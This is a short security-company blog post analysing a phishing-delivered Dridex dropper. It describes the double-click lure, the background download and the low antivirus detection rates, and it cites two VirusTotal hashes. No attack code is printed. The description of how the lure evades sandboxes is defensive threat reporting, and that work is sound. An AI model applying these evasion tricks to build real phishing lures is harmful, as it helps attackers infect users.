Detecting a Dridex Variant that Evades Anti-virus

Share Now

Facebook
Twitter
LinkedIn

Attackers constantly tweak their malware to avoid detection. The latest iteration of Dridex we’ve analyzed provides a great example of malware designed to evade anti-virus, sandboxing, and other detection technologies.

How did we get our hands on malware that went undetected by A/V? Since this malware (like the majority of malware) was delivered via a phishing email, we received the sample from a user reporting the phishing email using Reporter.

Here’s a screenshot of the phishing email sent to several of our users:

Phishing email sent to internal users
Figure 1 — Phishing email sent to internal users

In this specific example, the user is presented with a button to double-click in order to “display the content.”

Button to view content
Figure 2 — Button to double-click to view the content

Once double-clicked, the user is presented with a warning box.

Warning box
Figure 3 — Warning box presented to the user

When the user clicks OK, a command shell is spawned in the background to download a sample of Dridex.

Dridex download
Figure 4 — Dridex being downloaded

It’s amazing how many AV products flag this file as being malicious. The surprising answer is none of them.

Virus Total results
Figure 5 — 0/57 A/V hits

Since you need user-input to push the button…this bypasses sandbox technology as well! Once downloaded, the state of detection for Dridex is less grim, with 5/57 AV vendors picking up on it.

A/V hits for Dridex sample
Figure 6 — A/V hits for Dridex sample

While there is no silver bullet to security, user-generated reports have proven very successful here at PhishMe and other organizations, as many of our users have reported new and interesting threats that target not just us, but industries worldwide. By hooking the human into the security program, we not only find new and interesting malware, but we also close the gap on the kill chain.

Dropper: https://www.virustotal.com/en/file/244126a2873c26f76d9dfa8f993b4209ac8a52fd00a91d98a23c0c90764d1a73/analysis/

Dridex sample: https://www.virustotal.com/en/file/f2328ad463d584ba06cba3338d73b1ee2ba772401d51cf0c88c51aec53bd3623/analysis/1427292890/

Search

We use our own and third-party cookies to enhance your experience by showing you relevant content, personalizing our communications with you, and remembering your preferences when you visit our website. We also use them to improve the overall performance of our site. You can learn more about the cookies and similar technology we use by viewing our privacy policy. By clicking ‘Accept,’ you acknowledge and consent to our use of all cookies on our website.

This site is registered on wpml.org as a development site.